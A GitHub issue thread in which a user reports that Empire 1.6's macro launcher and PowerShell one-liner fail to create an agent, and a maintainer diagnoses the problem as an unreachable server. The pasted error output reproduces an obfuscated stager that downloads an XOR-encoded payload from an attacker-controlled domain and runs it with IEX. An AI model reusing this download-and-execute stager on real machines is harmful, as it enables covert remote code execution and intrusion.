### ISSUE TITLE
Macro Launcher or One-Liner in 1.6 does not create agent

### ISSUE THREAD

**Issue by skuta** [adaptivethreat/Empire#336]
## Empire Version
1.6

## OS Information (Linux flavor, Python version)

Kali 2.0
## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.

Expected behavior: Get agent connection in Empire.
Error that meterpreter returns upon running the one liner in meterpreter's session's shell: 

Important Note: I have tried the same in 2.0_beta and it had connected. The Listener's HOST is set to MYPRIVATEDNSDOMAIN.tk as 1.6 doesn't accept external (non interface IP address)

Update: I have tried this with Office macro and the same thing. The agent doesn't call back, agent callsb back from 2.0_Beta so I doubt it's server's fault.

## Screenshot of error, embedded text output, or Pastebin link to the error

 CLIXML

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><S S="Error">Exception calling "DownloadString" with "1" argument(s): "Unable to connect to _x000D__x000A_</S><S S="Error">the remote server"_x000D__x000A_</S><S S="Error">At line:1 char:415_x000D__x000A_</S><S S="Error">+ [SYSTem.Net.SErVicePoIntMAnageR]::EXpEct100CONTINuE = 0;$wC=NEW-OBjecT SYStEM_x000D__x000A_</S><S S="Error">.NEt.WEBCLieNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) li_x000D__x000A_</S><S S="Error">ke Gecko';$Wc.HeaDErs.AdD('User-Agent',$u);$WC.PrOxY = [SYSTEM.NeT.WEbRequeST]:_x000D__x000A_</S><S S="Error">:DeFAultWEBPROxY;$Wc.PrOXy.CredENtIalS = [SYSTEm.NET.CReDentiALCaCHE]::DeFaUltN_x000D__x000A_</S><S S="Error">etWorKCReDENtIalS;$K='Q@fz:67qy!d^pK9b#r\o[l,M./n=RW}|';$I=0;[Char[]]$B=([Char[_x000D__x000A_</S><S S="Error">]]($Wc.DownLoADSTRiNg &lt;&lt;&lt;&lt; ("http://MYPRIVATEDNSDOMAIN.tk/index.asp")))|%{$_-BXor$k[$i++%_x000D__x000A_</S><S S="Error">$K.LeNgTh]};IEX ($B-JoiN'')_x000D__x000A_</S><S S="Error">    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException_x000D__x000A_</S><S S="Error">    + FullyQualifiedErrorId : DotNetMethodException_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S><S S="Error">Invoke-Expression : Cannot bind argument to parameter 'Command' because it is a_x000D__x000A_</S><S S="Error">n empty string._x000D__x000A_</S><S S="Error">At line:1 char:482_x000D__x000A_</S><S S="Error">+ [SYSTem.Net.SErVicePoIntMAnageR]::EXpEct100CONTINuE = 0;$wC=NEW-OBjecT SYStEM_x000D__x000A_</S><S S="Error">.NEt.WEBCLieNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) li_x000D__x000A_</S><S S="Error">ke Gecko';$Wc.HeaDErs.AdD('User-Agent',$u);$WC.PrOxY = [SYSTEM.NeT.WEbRequeST]:_x000D__x000A_</S><S S="Error">:DeFAultWEBPROxY;$Wc.PrOXy.CredENtIalS = [SYSTEm.NET.CReDentiALCaCHE]::DeFaUltN_x000D__x000A_</S><S S="Error">etWorKCReDENtIalS;$K='Q@fz:67qy!d^pK9b#r\o[l,M./n=RW}|';$I=0;[Char[]]$B=([Char[_x000D__x000A_</S><S S="Error">]]($Wc.DownLoADSTRiNg("http://MYPRIVATEDNSDOMAIN.tk/index.asp")))|%{$_-BXor$k[$i++%$K.LeN_x000D__x000A_</S><S S="Error">gTh]};IEX &lt;&lt;&lt;&lt;  ($B-JoiN'')_x000D__x000A_</S><S S="Error">    + CategoryInfo          : InvalidData: (:) [Invoke-Expression], ParameterB _x000D__x000A_</S><S S="Error">   indingValidationException_x000D__x000A_</S><S S="Error">    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAl _x000D__x000A_</S><S S="Error">   lowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand_x000D__x000A_</S><S S="Error"> _x000D__x000A_</S></Objs>

PS: http://i.imgur.com/mw5znL7.png

**Comment by skuta** [comment]
Does anyone have the similar issue?

**Comment by leechristensen** [comment]
The empire server can't be reached on the machine where you're executing the launcher.  Either the server  isn't started or it's can't bind on port 80.  From your screenshot, it looks like the launcher is trying to contact myprivatednsdomain.tk and resolve the hostname.
